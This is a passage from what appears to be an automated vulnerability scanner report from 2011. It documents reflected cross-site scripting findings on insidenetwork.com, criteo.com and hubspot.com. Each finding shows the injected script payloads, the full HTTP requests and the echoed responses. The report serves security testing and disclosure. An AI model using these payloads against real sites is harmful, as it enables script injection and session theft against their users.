User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:00:45 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 17:00:46 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8817



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-content/plugins/vipers-video-quicktags/resources/swfobject.js457ee\"><script>alert(1)</script>9a56b274115?ver=2.2"/>
...[SNIP]...

3.7. http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/themes/emire/images/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc1cf"><script>alert(1)</script>9ab325cacf2 was submitted in the REST URL parameter 2. This input was echoed as bc1cf\"><script>alert(1)</script>9ab325cacf2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-contentbc1cf"><script>alert(1)</script>9ab325cacf2/themes/emire/images/favicon.ico HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0; __utmz=71161478.1305478436.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=71161478.1450298035.1305478436.1305478436.1305478436.1; __utmc=71161478; __utmb=71161478.1.10.1305478436

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 16:59:16 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 16:59:16 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8787



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-contentbc1cf\"><script>alert(1)</script>9ab325cacf2/themes/emire/images/favicon.ico"/>
...[SNIP]...

3.8. http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/themes/emire/images/favicon.ico

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69ee9"><script>alert(1)</script>2d0ceca286d was submitted in the REST URL parameter 3. This input was echoed as 69ee9\"><script>alert(1)</script>2d0ceca286d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-content/themes69ee9"><script>alert(1)</script>2d0ceca286d/emire/images/favicon.ico HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0; __utmz=71161478.1305478436.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=71161478.1450298035.1305478436.1305478436.1305478436.1; __utmc=71161478; __utmb=71161478.1.10.1305478436

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:00:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 17:00:04 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8787



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-content/themes69ee9\"><script>alert(1)</script>2d0ceca286d/emire/images/favicon.ico"/>
...[SNIP]...

3.9. http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/themes/emire/images/favicon.ico

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f79e0"><script>alert(1)</script>d4b91c9773f was submitted in the REST URL parameter 4. This input was echoed as f79e0\"><script>alert(1)</script>d4b91c9773f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-content/themes/emiref79e0"><script>alert(1)</script>d4b91c9773f/images/favicon.ico HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0; __utmz=71161478.1305478436.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=71161478.1450298035.1305478436.1305478436.1305478436.1; __utmc=71161478; __utmb=71161478.1.10.1305478436

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:00:52 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 17:00:53 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8787



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-content/themes/emiref79e0\"><script>alert(1)</script>d4b91c9773f/images/favicon.ico"/>
...[SNIP]...

3.10. http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/themes/emire/images/favicon.ico

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e098"><script>alert(1)</script>ed800befa73 was submitted in the REST URL parameter 5. This input was echoed as 2e098\"><script>alert(1)</script>ed800befa73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-content/themes/emire/images2e098"><script>alert(1)</script>ed800befa73/favicon.ico HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0; __utmz=71161478.1305478436.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=71161478.1450298035.1305478436.1305478436.1305478436.1; __utmc=71161478; __utmb=71161478.1.10.1305478436

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:01:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 17:01:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8787



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-content/themes/emire/images2e098\"><script>alert(1)</script>ed800befa73/favicon.ico"/>
...[SNIP]...

3.11. http://gold.insidenetwork.com/facebook/wp-content/themes/emire/images/favicon.ico [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gold.insidenetwork.com
Path:	/facebook/wp-content/themes/emire/images/favicon.ico

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7a90"><script>alert(1)</script>ce7cba30b99 was submitted in the REST URL parameter 6. This input was echoed as d7a90\"><script>alert(1)</script>ce7cba30b99 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /facebook/wp-content/themes/emire/images/favicon.icod7a90"><script>alert(1)</script>ce7cba30b99 HTTP/1.1
Host: gold.insidenetwork.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=9bij1cq4k9vurorpstbb5qugd0; __utmz=71161478.1305478436.1.1.utmcsr=insidefacebook.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=71161478.1450298035.1305478436.1305478436.1305478436.1; __utmc=71161478; __utmb=71161478.1.10.1305478436

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:02:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.6
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://gold.insidenetwork.com/facebook/xmlrpc.php
Last-Modified: Sun, 15 May 2011 17:02:22 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 8787



<!DO
...[SNIP]...
<input type="hidden" name="amember_redirect_url" value="/facebook/wp-content/themes/emire/images/favicon.icod7a90\"><script>alert(1)</script>ce7cba30b99"/>
...[SNIP]...

3.12. http://www.criteo.com/templates/criteo/js/script.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/js/script.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8de30"%3balert(1)//ec791d82ad1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8de30";alert(1)//ec791d82ad1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /templates/criteo/js/script.php?templateImagePath=/templates/criteo/ima/8de30"%3balert(1)//ec791d82ad1ges/ HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:10 GMT
Date: Sun, 15 May 2011 16:58:08 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/4.4.9
Content-Type: application/x-javascript
Content-Length: 4827

var templateImagePath = "/templates/criteo/ima/8de30";alert(1)//ec791d82ad1ges/";
var successStoriesHeight = 0;

window.addEvent("load", function ()
{
   $$("a").each(function (obj)
   {
       if (obj.href && obj.rel == "external")
       {
           obj.target = "_blank";
       }
   });
});

function
...[SNIP]...

3.13. http://www.criteo.com/templates/criteo/js/script.php [templateImagePath parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.criteo.com
Path:	/templates/criteo/js/script.php

Issue detail

The value of the templateImagePath request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6ebc3"%3balert(1)//d807e7367af was submitted in the templateImagePath parameter. This input was echoed as 6ebc3";alert(1)//d807e7367af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /templates/criteo/js/script.php?templateImagePath=/templates/criteo/images/6ebc3"%3balert(1)//d807e7367af HTTP/1.1
Host: www.criteo.com
Proxy-Connection: keep-alive
Referer: http://www.criteo.com/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.3.10.1305478412; 240plan=R1146701318; 0ecea38193df0c9bab184bf1b140820e=3c4941b52ae17188bef1bb9b7eb39f0c; jfcookie[lang]=us

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R1146701318; path=/; expires=Wed, 18-May-2011 05:10:09 GMT
Date: Sun, 15 May 2011 16:56:36 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/4.4.9
Content-Type: application/x-javascript
Content-Length: 4826

var templateImagePath = "/templates/criteo/images/6ebc3";alert(1)//d807e7367af";
var successStoriesHeight = 0;

window.addEvent("load", function ()
{
   $$("a").each(function (obj)
   {
       if (obj.href && obj.rel == "external")
       {
           obj.target = "_blank";
       }
   });
});

function pre
...[SNIP]...

3.14. http://www.hubspot.com/free-trial/Default.aspx [LeadGen_ContactForm_10273_m66219:Biggest_Marketing_Challenge__c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hubspot.com
Path:	/free-trial/Default.aspx

Issue detail

The value of the LeadGen_ContactForm_10273_m66219:Biggest_Marketing_Challenge__c request parameter is copied into the HTML document as plain text between tags. The payload 16368<script>alert(1)</script>396df5a84505c6ed9 was submitted in the LeadGen_ContactForm_10273_m66219:Biggest_Marketing_Challenge__c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /free-trial/Default.aspx?RewriteStatus=1&__VIEWSTATE=%2fwEPDwULLTEyNDEwNzkwMjkPZBYGZg8WAh4EVGV4dAUPPCFET0NUWVBFIGh0bWw%2bZAIBD2QWDgIBDxYCHgdWaXNpYmxlaGQCAg8WAh4HY29udGVudAVvR2V0IGEgZnJlZSB0cmlhbCBvZiB0aGUgSHViU3BvdCBpbmJvdW5kIG1hcmtldGluZyBzb2Z0d2FyZSB0byBoZWxwIGdlbmVyYXRlIG1vcmUgdmlzaXRvcnMsIGxlYWRzIGFuZCBjdXN0b21lcnMuZAIDDxYCHwJkZAIEDxYCHwIFFkNvcHlyaWdodCAoYykgMjAxMSBieSBkAgUPFgIfAgUISHViU3BvdCBkAgYPFgIfAmRkAg8PFgIfAAWoBDxsaW5rIHJlbD0iYWx0ZXJuYXRlIiB0eXBlPSJhcHBsaWNhdGlvbi9yc3MreG1sIiB0aXRsZT0iSHViU3BvdCBDb21wYW55ICZhbXA7YW1wJiN4M2I7IFByb2R1Y3QgTmV3cyBCbG9nIiBocmVmPSJodHRwJiN4M2E7JiN4MmY7JiN4MmY7d3d3Lmh1YnNwb3QuY29tJiN4MmY7Q01TJiN4MmY7VUkmI3gyZjtNb2R1bGVzJiN4MmY7Qml6QmxvZ2dlciYjeDJmO3Jzcy5hc3B4JiN4M2Y7dGFiaWQmI3gzZDs4NTc2JmFtcDttb2R1bGVpZCYjeDNkOzEwMTE2JmFtcDttYXhjb3VudCYjeDNkOzI1Ii8%2bDQo8bGluayByZWw9ImFsdGVybmF0ZSIgdHlwZT0iYXBwbGljYXRpb24vcnNzK3htbCIgdGl0bGU9Ikh1YlNwb3QgSW50ZXJuZXQgTWFya2V0aW5nIENhc2UgU3R1ZGllcyIgaHJlZj0iaHR0cCYjeDNhOyYjeDJmOyYjeDJmO3d3dy5odWJzcG90LmNvbSYjeDJmO0NNUyYjeDJmO1VJJiN4MmY7TW9kdWxlcyYjeDJmO0JpekJsb2dnZXImI3gyZjtyc3MuYXNweCYjeDNmO3RhYmlkJiN4M2Q7NTg2NjgmYW1wO21vZHVsZWlkJiN4M2Q7NDQ4ODcmYW1wO21heGNvdW50JiN4M2Q7MjUiLz4NCmQCAg9kFgICAw9kFgICAw9kFgICAQ9kFgQCAw9kFgZmD2QWAgIED2QWAmYPZBYCZg9kFgJmDxYCHwAF3AU8b2JqZWN0IHN0eWxlPSJkaXNwbGF5OiBibG9jazsgbWFyZ2luLWxlZnQ6IGF1dG87IG1hcmdpbi1yaWdodDogYXV0bzsiIGNsYXNzaWQ9ImNsc2lkOmQyN2NkYjZlLWFlNmQtMTFjZi05NmI4LTQ0NDU1MzU0MDAwMCIgd2lkdGg9IjIwMCIgaGVpZ2h0PSIxMzciIGNvZGViYXNlPSJodHRwOi8vZG93bmxvYWQubWFjcm9tZWRpYS5jb20vcHViL3Nob2Nrd2F2ZS9jYWJzL2ZsYXNoL3N3Zmxhc2guY2FiI3ZlcnNpb249NiwwLDQwLDAiPgo8cGFyYW0gbmFtZT0iYWxsb3dGdWxsU2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz4KPHBhcmFtIG5hbWU9ImFsbG93c2NyaXB0YWNjZXNzIiB2YWx1ZT0iYWx3YXlzIiAvPgo8cGFyYW0gbmFtZT0ic3JjIiB2YWx1ZT0iaHR0cDovL3d3dy55b3V0dWJlLmNvbS92L20wVVF1Y1dNMFp3P2ZzPTEmYW1wO2hsPWVuX1VTIiAvPgo8cGFyYW0gbmFtZT0iYWxsb3dmdWxsc2NyZWVuIiB2YWx1ZT0idHJ1ZSIgLz48ZW1iZWQgc3R5bGU9ImRpc3BsYXk6IGJsb2NrOyBtYXJnaW4tbGVmdDogYXV0bzsgbWFyZ2luLXJpZ2h0OiBhdXRvOyIgdHlwZT0iYXBwbGljYXRpb24veC1zaG9ja3dhdmUtZmxhc2giIHdpZHRoPSIyMDAiIGhlaWdodD0iMTM3IiBzcmM9Imh0dHA6Ly93d3cueW91dHViZS5jb20vdi9tMFVRdWNXTTBadz9mcz0xJmFtcDtobD1lbl9VUyIgYWxsb3dzY3JpcHRhY2Nlc3M9ImFsd2F5cyIgYWxsb3dmdWxsc2NyZWVuPSJ0cnVlIj48L2VtYmVkPgo8L29iamVjdD5kAgEPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAWwBTxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPkh1YlNwb3QgaXMgY29tbWl0dGVkIHRvIG1ha2luZyBvdXIgY3VzdG9tZXJzIHN1Y2Nlc3NmdWwgd2l0aCBpbmJvdW5kIG1hcmtldGluZy4gQnV0IEh1YlNwb3QgaXNuJ3QgcmlnaHQgZm9yIGV2ZXJ5b25lLiA8YnIgLz48YnIgLz5Zb3UgcXVhbGlmeSBmb3IgYSBIdWJTcG90IHRyaWFsIGlmOjxiciAvPjxiciAvPiA8c3Ryb25nPio8L3N0cm9uZz4gVGhlIGdvYWwgb2YgeW91ciB3ZWJzaXRlIGlzIHRvIDxzdHJvbmc%2bZ2VuZXJhdGUgbGVhZHM8L3N0cm9uZz4gZm9yIHlvdXIgYnVzaW5lc3MuPGJyIC8%2bPGJyIC8%2bIDxzdHJvbmc%2bKjwvc3Ryb25nPiBZb3Ugd2FudCB0byB0YWtlIG9uIEludGVybmV0IG1hcmtldGluZyB5b3Vyc2VsZiwgYW5kIGhhdmUgPHN0cm9uZz50aW1lIGFuZCByZXNvdXJjZXM8L3N0cm9uZz4gc2V0IGFzaWRlIGZvciB0aGlzIHB1cnBvc2UuPC9wPgo8L2Rpdj5kAgIPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAX1BDxkaXYgc3R5bGU9ImJvcmRlcjogMXB4IHNvbGlkICNjOGM4Yzg7IGJhY2tncm91bmQtY29sb3I6ICNlZWVlZWU7IGJhY2tncm91bmQtaW1hZ2U6IG5vbmU7IGJhY2tncm91bmQtcmVwZWF0OiByZXBlYXQ7IGJhY2tncm91bmQtYXR0YWNobWVudDogc2Nyb2xsOyBiYWNrZ3JvdW5kLXBvc2l0aW9uOiAwJSAwJTsiPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTRweDsiPjxlbT4iU2luY2Ugc3RhcnRpbmcgd2l0aCBIdWJTcG90LCA8c3Ryb25nPndlYnNpdGUgdHJhZmZpYyBoYXMgbW9yZSB0aGFuIGRvdWJsZWQgPC9zdHJvbmc%2bZnJvbSA1MDAgdmlzaXRvcnMgcGVyIG1vbnRoIHRvIG92ZXIgMTAwMCwgPHN0cm9uZz5hbmQgPC9zdHJvbmc%2bPHN0cm9uZz5JIGhhdmUgYWxyZWFkeSBnZW5lcmF0ZWQgYSBudW1iZXIgb2YgbGVhZHMgdGhhdCBwYXkgZm9yIEh1YlNwb3QgMzAgdGltZXMgb3Zlci4iIDwvc3Ryb25nPjwvZW0%2bPC9wPgo8cCBzdHlsZT0icGFkZGluZy1sZWZ0OiAxMnB4OyBwYWRkaW5nLXJpZ2h0OiA5cHg7IGZvbnQtc2l6ZTogMTNweDsiPjxlbT4tTm9lbCBIdWVsc2VuYmVjaywgUHJlc2lkZW50LCBWb2NpbyA8L2VtPjwvcD4KPC9kaXY%2bZAIED2QWAmYPZBYCAgQPZBYCZg9kFgJmD2QWAmYPFgIfAAXIBzxoND5PcHRpbWl6ZSB5b3VyIHdlYnNpdGUgdG8gPHN0cm9uZz5nZXQgZm91bmQ8L3N0cm9uZz4gYnkgbW9yZSBwcm9zcGVjdHMgYW5kIDxzdHJvbmc%2bY29udmVydCA8L3N0cm9uZz4gbW9yZSBvZiB0aGVtIGludG8gPHN0cm9uZz5sZWFkcyBhbmQgcGF5aW5nIGN1c3RvbWVyczwvc3Ryb25nPiB3aXRoIEh1YlNwb3QncyBpbmJvdW5kICBtYXJrZXRpbmcgc29mdHdhcmUuPC9oND4KPHA%2bPHN0cm9uZz4gPGltZyBzcmM9Ii9Qb3J0YWxzLzUzL2ltYWdlcy9IdWJTcG90X1NvZnR3YXJlLnBuZyIgYm9yZGVyPSIwIiBhbHQ9Ikh1YlNwb3QgU29mdHdhcmUiIGhzcGFjZT0iMCIgdnNwYWNlPSIwIiBjbGFzcz0iYWxpZ25SaWdodCIgc3R5bGU9ImZsb2F0OiByaWdodDsiIC8%2bPGJyIC8%2bWW91ciBGcmVlIFRyaWFsIG9mIEh1YlNwb3Q6IDwvc3Ryb25nPjwvcD4KPHVsPgo8bGk%2bR2l2ZXMgeW91IHRvb2xzIHRvIDxlbT5nZXQgZm91bmQgb25saW5lPC9lbT4gYnkgbW9yZSBxdWFsaWZpZWQgdmlzaXRvcnMuPC9saT4KPGxpPlNob3dzIHlvdSBob3cgdG8gPGVtPmNvbnZlcnQgbW9yZTwvZW0%2bIHZpc2l0b3JzIGludG8gbGVhZHMuPC9saT4KPGxpPkdpdmVzIHlvdSB0b29scyB0byA8ZW0%2bY2xvc2UgdGhvc2UgbGVhZHMgZWZmaWNpZW50bHk8L2VtPi48L2xpPgo8bGk%2bUHJvdmlkZXMgYW5hbHl0aWNzIHRvIGhlbHAgeW91IG08ZW0%2bYWtlIHNtYXJ0IG1hcmtldGluZyBpbnZlc3RtZW50czwvZW0%2bLjwvbGk%2bCjwvdWw%2bCjx1bD4KPC91bD4KPHA%2bPGJyIC8%2bWW91ciBmcmVlIHRyaWFsIGdpdmVzIHlvdSBhY2Nlc3MgdG8gYWxsIG9mIEh1YlNwb3QncyB0b29scyBhbmQgY3VzdG9tZXItb25seSByZXNvdXJjZXMuPC9wPgo8cD5UaGVyZSdzIDxzdHJvbmc%2bbm8gcmlzazwvc3Ryb25nPiwgPHN0cm9uZz5ubyBvYmxpZ2F0aW9uPC9zdHJvbmc%2bLCBhbmQgPHN0cm9uZz5ubyBjcmVkaXQgY2FyZDwvc3Ryb25nPiByZXF1aXJlZC48L3A%2bZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUVZG5uOklOR0VOSU1FTlUxOl9jdGwwIKoaNbs8%2flwSOS5lpqE0UiyhZtU%3d&dnn%3aINGENIMENU1%3a_ctl0=%0d&LeadGen_ContactForm_10273_m66219submitter_user_token=a3ef224db6434804a3e24ca05d84f49f&ContactFormId=10273&LeadGen_ContactForm_10273_m66219spam_check_key=jggksnhejohgplhhsqookmjojleogkigfklmeindumpwrhjglwdiswdwrthh&LeadGen_ContactForm_10273_m66219spam_check_sig=119116116120128123117114119124117116125121117117128126124124120122119124119121114124116120118116115120121122114118123113130122125132127117119116121132113118128132113132127129117117&LeadGen_ContactForm_10273_m66219%3aFirstName=%0d&LeadGen_ContactForm_10273_m66219%3aLastName=%0d&LeadGen_ContactForm_10273_m66219%3aEmail=%0d&LeadGen_ContactForm_10273_m66219%3aPhone=%0d&LeadGen_ContactForm_10273_m66219%3aCompany=%0d&LeadGen_ContactForm_10273_m66219%3aWebsite=%0d&LeadGen_ContactForm_10273_m66219%3aB2B_vs_B2C_PRELIM__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aEmployees__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aRole__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aMarketing_Company_auto__c=-+Please+Select+-&LeadGen_ContactForm_10273_m66219%3aBiggest_Marketing_Challenge__c=%0d16368%3cscript%3ealert%281%29%3c%2fscript%3e396df5a84505c6ed9&LeadGen_ContactForm_Submit_LeadGen_ContactForm_10273_m66219=Start+Your+Free+Trial+Now&ScrollTop=%0d&__dnnVariable=%0d&hsFirstVisitHidden=http%25253A%25252F%25252Fwww.hubspot.com%25252Febooks%25252Ffacebook-page-marketing-ebook-2011%25252F%25253Fsource%25253Dhspd-InsideFacebook-200x200ad-201104%257chttp%25253A%25252F%25252Fwww.insidefacebook.com%25252F%257c2011-05-15%25252012%25253A53%25253A12 HTTP/1.1
Host: www.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/free-trial/
Cache-Control: max-age=0
Origin: http://www.hubspot.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
